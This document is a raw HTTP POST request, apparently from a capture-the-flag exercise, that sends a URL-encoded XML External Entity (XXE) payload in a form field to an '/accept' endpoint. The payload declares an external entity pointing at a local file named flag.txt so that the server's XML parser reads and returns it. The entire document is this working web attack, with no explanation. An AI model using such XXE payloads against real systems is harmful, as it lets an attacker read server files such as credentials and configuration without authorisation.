POST /accept HTTP/1.1
Host: 184.72.87.9:8013
Content-Length: 272
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://184.72.87.9:8013
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://184.72.87.9:8013/post
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

postXml=%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22ISO-8859-1%22%3f%3e%0a%20%3c!DOCTYPE%20foo%20%5b%20%20%0a%20%20%3c!ELEMENT%20foo%20ANY%20%3e%0a%20%20%3c!ENTITY%20xxe%20SYSTEM%20%22file%3a%2f%2f%2fJustGoAround%2fflag.txt%22%20%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e